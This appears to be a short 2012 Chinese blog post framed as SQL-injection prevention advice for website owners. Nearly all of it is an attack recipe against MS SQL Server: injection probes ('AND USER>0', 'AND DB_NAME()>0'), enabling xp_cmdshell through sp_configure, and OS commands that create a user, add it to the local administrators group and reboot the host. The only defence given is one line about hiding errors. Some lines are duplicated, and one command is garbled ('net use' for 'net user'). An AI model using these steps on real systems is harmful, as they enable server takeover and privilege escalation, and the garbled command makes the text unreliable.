献给做网站的朋友:防sql注入,可对现有网站进行安全测试
一般步骤:
一般步骤:
1.测试注入点
2.查看当前DB用户名
AND USER>0
查看当前DB名:
AND DB_NAME()>0
AND DB_NAME()>0
3.若SA,则打开高级配置
EXEC sp_configure 'show advanced options',1
4.打开CMDSHELL
EXEC sp_configure 'xp_cmdshell',1
5.操作系统CMD
添加用户:net use name pwd /add
加入群组:net localgroup administrators name /add
激活:net user name pwd /active:yes
重启:shutdown -r
整一句话。。。别抛异常,上线的时候将debug设为false,发生错误跳转至错误页
整一句话。。。别抛异常,上线的时候将debug设为false,发生错误跳转至错误页
我的更多文章:
- (2012-09-27 12:40:16)
- (2012-09-27 12:38:41)